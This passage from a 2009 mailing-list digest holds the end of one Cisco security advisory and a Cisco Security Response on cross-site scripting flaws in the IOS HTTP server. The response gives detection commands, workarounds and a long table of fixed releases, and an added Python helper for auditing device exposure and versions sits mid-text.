customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found by reviewing Cisco TAC service requests.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Revision 1.0
For Public Release 2009 January 14 1600 UTC (GMT)
---------------------------------------------------------------------
Cisco Response
==============
Two separate Cisco IOS Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.
This Cisco Security Response is posted at the following link:
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml
Additional Information
======================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including the HTTP secure server, hereafter referred
to simply as the HTTP server) and applies to all Cisco products that
run Cisco IOS Software versions 11.0 through 12.4 with the HTTP
server enabled. A system that contains the IOS HTTP server or HTTP
secure server but does not have it enabled is not affected.
To determine whether the HTTP server is running on your device, issue
the commands "show ip http server status | include status" and "show
ip http server secure status | include status" at the prompt and look
for output similar to:
Router#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
If the device is not running the HTTP server, you should see output
similar to:
Router#show ip http server status | include status
HTTP server status: Disabled
HTTP secure server status: Disabled
These vulnerabilities are documented in the following Cisco bug IDs:
* Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server
Special characters are not escaped in URL strings sent to the
HTTP server.
* Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
Special characters are not escaped in URL strings sent to the
HTTP server via the ping parameter. The ping parameter is used
both by external applications such as Router and Security Device
Manager (SDM) and by a direct HTTP session to the Cisco IOS HTTP
server. This vulnerability affects 12.1E-based trains and all
Cisco IOS releases after 12.2(13)T.
These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.
Workaround
+---------
If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:
no ip http server
no ip http secure-server
If the HTTP server is required, it is a recommended best practice to
restrict access to the HTTP server to trusted hosts only. To do so,
apply an access list to the HTTP server with the following command
in global configuration mode:
ip http access-class {access-list-number | access-list-name}
The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:
ip access-list standard 20
permit 192.168.1.0 0.0.0.255
remark "Above is a trusted subnet"
remark "Add further trusted subnets or hosts below"
! (Note: all other access implicitly denied)
! (Apply the access-list to the http server)
ip http access-class 20
For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.
For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml
Further Problem Description
+--------------------------
This vulnerability concerns the escaping of characters in the URL
that is sent to the HTTP server. It is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix is to
escape special characters in the URL string echoed in the response
generated by the web exec application.
Software Version and Fixes
+-------------------------
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).
For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL:
http://www.cisco.com/warp/public/620/1.html
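The two checks described above (is the HTTP server enabled at all, and is the running release below the First Fixed Release of its train) are easy to script across a device inventory. The helper below is an added example, not part of Cisco's response; the show-command output it parses is a constructed sample, and the version ordering it applies is only the within-train rule the text states (cross-train "first fixed in ..." rows are reported as needing the table).

```python
"""Added audit helper (not part of Cisco's response): scripts the two checks
the text describes.  (1) Is the IOS HTTP or HTTP secure server enabled?  A
device with the server present but disabled is not affected.  (2) Is the
running release earlier than the First Fixed Release of its train?  By the
table's rule, a release in the same train that is less than the First Fixed
Release is vulnerable.  Cross-train migrations (e.g. "first fixed in 12.4")
are not modelled; those rows are reported as needing the table."""
import re
from typing import Optional

# Constructed sample of `show ip http server status | include status`;
# not captured from a real device.
SAMPLE_STATUS_OUTPUT = """\
Router#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Disabled
"""

_STATUS_RE = re.compile(
    r"^HTTP (secure )?server status:\s*(Enabled|Disabled)\s*$", re.IGNORECASE
)


def http_server_status(show_output: str) -> dict:
    """Parse the status lines into {'http': bool, 'https': bool}.

    A server whose status line is absent is reported as disabled only
    because nothing else can be said; a fleet audit should treat a missing
    line as "re-run the command", not as safe.
    """
    status = {"http": False, "https": False}
    for line in show_output.splitlines():
        m = _STATUS_RE.match(line.strip())
        if m:
            status["https" if m.group(1) else "http"] = m.group(2).lower() == "enabled"
    return status


def exposed(show_output: str) -> bool:
    """The response applies only when at least one HTTP server is enabled."""
    s = http_server_status(show_output)
    return s["http"] or s["https"]


# Cisco IOS release notation as used in the table: MAJOR.MINOR(MAINT)TRAIN[REBUILD]
#   12.4(15)T8   -> major 12, minor 4, maintenance 15, train T, rebuild 8
#   12.2(33)SCA2 -> train SCA, rebuild 2;  12.4(23) -> mainline, no train
# A letter after the maintenance number (12.2(33r)SRD2) is accepted and ignored.
_VERSION_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)\((?P<maint>\d+)[a-z]*\)"
    r"(?P<train>[A-Z]*)(?P<rebuild>\d+)?$"
)


class IOSVersion:
    def __init__(self, text: str):
        m = _VERSION_RE.match(text.strip())
        if not m:
            raise ValueError(f"unrecognised IOS release string: {text!r}")
        self.major, self.minor = int(m["major"]), int(m["minor"])
        self.maint = int(m["maint"])
        self.train = m["train"]
        self.rebuild = int(m["rebuild"]) if m["rebuild"] else 0

    def same_train(self, other: "IOSVersion") -> bool:
        # Ordering is only defined inside one release train of one major.minor.
        return (self.major, self.minor, self.train) == (other.major, other.minor, other.train)

    def __lt__(self, other: "IOSVersion") -> bool:
        if not self.same_train(other):
            raise ValueError("releases from different trains are not ordered")
        return (self.maint, self.rebuild) < (other.maint, other.rebuild)


def vulnerable_by_version(running: str, first_fixed: str) -> Optional[bool]:
    """True if `running` is below `first_fixed` in the same train, False if it
    is at or beyond it, None if the trains differ (use the table's
    'first fixed in ...' / 'migrate to ...' guidance instead)."""
    r, f = IOSVersion(running), IOSVersion(first_fixed)
    if not r.same_train(f):
        return None
    return r < f


def assess(show_output: str, running: str, first_fixed: str) -> str:
    """Combine both checks the way a fleet audit would."""
    if not exposed(show_output):
        return "not exposed (HTTP server disabled)"
    v = vulnerable_by_version(running, first_fixed)
    if v is None:
        return "exposed; different train, consult the table"
    return "vulnerable" if v else "fixed"


if __name__ == "__main__":
    print(assess(SAMPLE_STATUS_OUTPUT, "12.4(13)T", "12.4(15)T8"))   # vulnerable
    print(assess(SAMPLE_STATUS_OUTPUT, "12.4(15)T8", "12.4(15)T8"))  # fixed
```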
+----------------------------------------+
| Major | Availability of Repaired |
| Release | Releases |
|------------+---------------------------|
| Affected | First Fixed | Recommended |
| 12.0-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0DC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | 12.0(33)S3; | |
| 12.0S | Available | |
| | on | |
| | 03-APR-2009 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SC | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SL | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0SP | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0ST | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SX | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SY | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.0SZ | first fixed | |
| | in 12.0S | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.0(3c)W5 |
| 12.0W | first fixed | (8) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0WC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.0WT | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.0XF | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.0(4)XI2 | |
| | are | |
| | vulnerable, | |
| 12.0XI | release | 12.4(15) |
| | 12.0(4)XI2 | T812.4(23) |
| | and later | |
| | are not | |
| | vulnerable; | |
| | first fixed | |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XK | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XN | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.0XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.1-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1AA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AX | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AY | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1AZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1CX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1DC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1E | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1EA | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| 12.1EB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(33) |
| 12.1EC | first fixed | SCA212.2 |
| | in 12.3BC | (33)SCB12.3 |
| | | (23)BC6 |
|------------+-------------+-------------|
| 12.1EO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.1EU | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.1EV | first fixed | S1212.2(33) |
| | in 12.4 | SB312.4(15) |
| | | T812.4(23) |
|------------+-------------+-------------|
| | | 12.2(31) |
| | Vulnerable; | SGA912.2 |
| 12.1EW | first fixed | (50)SG12.4 |
| | in 12.4 | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1EX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1EY | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1EZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1GA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1GB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1T | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XE | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XF | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XG | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XI | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XJ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XL | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XM | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XP | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XQ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XR | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XS | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XT | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XU | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XV | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XY | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1XZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YC | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Releases | |
| | prior to | |
| | 12.1(5)YE6 | |
| | are | |
| | vulnerable, | |
| 12.1YE | release | 12.4(15) |
| | 12.1(5)YE6 | T812.4(23) |
| | and later | |
| | are not | |
| | vulnerable; | |
| | first fixed | |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YF | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.1YH | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| 12.1YI | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.1YJ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| Affected | First Fixed | Recommended |
| 12.2-Based | Release | Release |
| Releases | | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2 | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2B | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2BC | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BW | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(33) |
| 12.2BX | first fixed | SB312.4(15) |
| | in 12.4 | T812.4(23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BY | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2BZ | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2CX | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | | 12.2(33) |
| | Vulnerable; | SCA212.2 |
| 12.2CY | first fixed | (33)SCB12.3 |
| | in 12.4 | (23)BC612.4 |
| | | (15)T812.4 |
| | | (23) |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(20) |
| 12.2CZ | first fixed | S1212.2(33) |
| | in 12.2SB | SB3 |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DA | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DD | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2DX | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.2EW | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(31) |
| 12.2EWA | first fixed | SGA912.2 |
| | in 12.2SG | (50)SG |
|------------+-------------+-------------|
| 12.2EX | 12.2(40)EX | 12.2(44)EX1 |
|------------+-------------+-------------|
| | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY | Available | Available |
| | on | on |
| | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2EZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2FX | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(44) |
| 12.2FY | first fixed | EX112.2(44) |
| | in 12.2EX | SE4 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2FZ | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| 12.2IRA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2IRB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2IXA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXB | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXC | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXD | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXE | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXF | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2IXG | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2JA | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2JK | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2MB | first fixed | T812.4(23) |
| | in 12.4 | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2MC | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2S | first fixed | 12.2(20)S12 |
| | in 12.2SB | |
|------------+-------------+-------------|
| | 12.2(33) | |
| | SB12.2(31) | |
| 12.2SB | SB14; | 12.2(33)SB3 |
| | Available | |
| | on | |
| | 16-JAN-2009 | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SBC | first fixed | 12.2(33)SB3 |
| | in 12.2SB | |
|------------+-------------+-------------|
| 12.2SCA | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SCB | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SE | 12.2(40)SE | 12.2(44)SE4 |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEA | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEB | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEC | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SED | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEE | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SEF | first fixed | 12.2(44)SE4 |
| | in 12.2SE | |
|------------+-------------+-------------|
| | Vulnerable; | 12.2(44) |
| 12.2SEG | first fixed | EX112.2(44) |
| | in 12.2EX | SE4 |
|------------+-------------+-------------|
| 12.2SG | 12.2(44)SG | 12.2(50)SG |
|------------+-------------+-------------|
| 12.2SGA | 12.2(31) | 12.2(31) |
| | SGA9 | SGA9 |
|------------+-------------+-------------|
| 12.2SL | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SM | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SO | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SQ | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SR | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SRA | migrate to | 12.2(33) |
| | any release | SRC3 |
| | in 12.2SRC | |
|------------+-------------+-------------|
| | Vulnerable; | |
| 12.2SRB | migrate to | 12.2(33) |
| | any release | SRC3 |
| | in 12.2SRC | |
|------------+-------------+-------------|
| 12.2SRC | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2SRD | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| 12.2STE | Not | |
| | Vulnerable | |
|------------+-------------+-------------|
| | Vulnerable; | 12.4(15) |
| 12.2SU | first fixed | T812.4(23) |
| | in 12.4T | |
|------------+-------------+-------------|
| 12.2SV | Vulnerable; | |
| | contact TAC | |
|------------+-------------+-------------|
| 12.2SVA | Vulnerable; | |
| | contact TAC | |
